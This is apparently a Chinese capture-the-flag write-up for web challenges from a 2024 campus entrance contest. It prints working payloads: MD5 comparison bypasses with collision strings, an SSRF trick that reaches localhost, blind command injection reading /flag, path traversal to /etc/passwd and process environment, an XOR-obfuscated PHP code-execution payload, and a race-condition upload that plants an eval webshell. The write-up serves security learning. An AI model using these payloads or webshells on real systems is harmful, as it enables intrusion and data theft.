云曦2024秋季开学考

ezezssrf

第一关：md5弱比较

yunxi%5B%5D=1&wlgf%5B%5D=2

第二关： md5强比较

需要在bp中传参，在hackbar里不行

yunxii=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DC

V%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%

93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

wlgff=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV

%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%9

3%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

第三关：ssrf

GLG=http://blog.csdn.net@127.0.0.1

第四关：无回显命令执行

运用tee命令或者>写入文件

cmd=cat /flag | tee 1.txt

完整payload：

yunxi%5B%5D=1&wlgf%5B%5D=2&yunxii=M%C9h%FF%0E%E3%5C%20%95r%D4w%7B

r%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00

%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&wlgff=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&GLG=http://blog.csdn.net@127.0.0.1&cmd=cat /flag | tee 1.txt

小小py

点击图片能够下载，用bp抓包

发现图片的下载路径

尝试利用这个路径查看文件，发现不能直接回显

尝试用目录穿越查看一下/etc/passwd发现成功回显

接着查看当前进程运行的环境变量/proc/self/environ，发现flag

学习高数

用dirsearch等工具扫描没发现注入点

根据提示

访问发现是原页面，用bp抓包进行页面爆破

发现一个不同的页面

访问cvFXZohgjf.php

限制了payload长度并且禁用一堆符号

原payload：

?c=$pi=_GET;$pi=$$pi;$pi[0]($pi[1])&0=system&1=cat /flag

这里我们可以利用异或得到更多的字符构造

用脚本利用白名单里的函数生成可用字符

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "\n";
        }
    }
}

将得到的结果放入记事本搜索需要构造的字符

$pi=_GET->$pi=(is_nan^(6).(4)).(tan^(1).(5))

$$pi->$_GET

由于[]被禁用所以可以用{}

完整payload：

$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag

 payload得到flag（这里的flag环境有问题）

你能跟上我的speed吗

随便上传文件后发现都只是一张图片

根据题目的speed可以猜测一下可能是条件竞争

上传文件写入一句话木马：

<?php $op=fopen("shell.php","a+");fwrite($op,'<?php @eval($_POST[cmd]);?>');fclose($op);echo(333) ?>

抓包上传文件的请求并发送到intruder

抓包访问上传文件的路径

两处的payload type都设为null payloads，payload setting选择Continue indefinitely(无限循环抓包)

两边同时爆破，在文件上传路径页面爆到显示333页面停止

发送到repeater，更改1.php为shell.php，访问成功

 用蚁剑连接

找到flag

文件上传